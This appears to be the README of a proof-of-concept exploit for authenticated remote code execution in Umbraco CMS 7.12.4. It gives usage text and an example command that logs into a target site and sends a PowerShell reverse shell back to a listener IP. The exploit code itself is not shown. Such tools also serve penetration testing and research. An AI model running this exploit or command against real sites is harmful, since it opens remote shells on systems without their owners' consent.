Umbraco CMS 7.12.4 - (Authenticated) Remote Code Execution

Jonoans/Umbraco-RCE

Umbraco RCE PowerShell Reverse Shell PoC

Usage

usage: exploit.py [-h] -u USER -p PASS -w URL -i IP

Umbraco authenticated RCE

optional arguments:
  -h, --help                 show this help message and exit
  -u USER, --user USER       Username / Email
  -p PASS, --password PASS   Login password
  -w URL, --website-url URL  Root URL
  -i IP, --ip IP             IP address of callback listener

Examples:

python exploit.py -u admin@example.org -p password123 -w 'http://remote.website/' -i 10.10.10.1

Requirements

To install dependencies:

pip install -r requirements.txt

Reference

This is a touch-up of noraj's PoC, which is based on EDB-ID-46153.
This version provides a PowerShell reverse shell upon execution.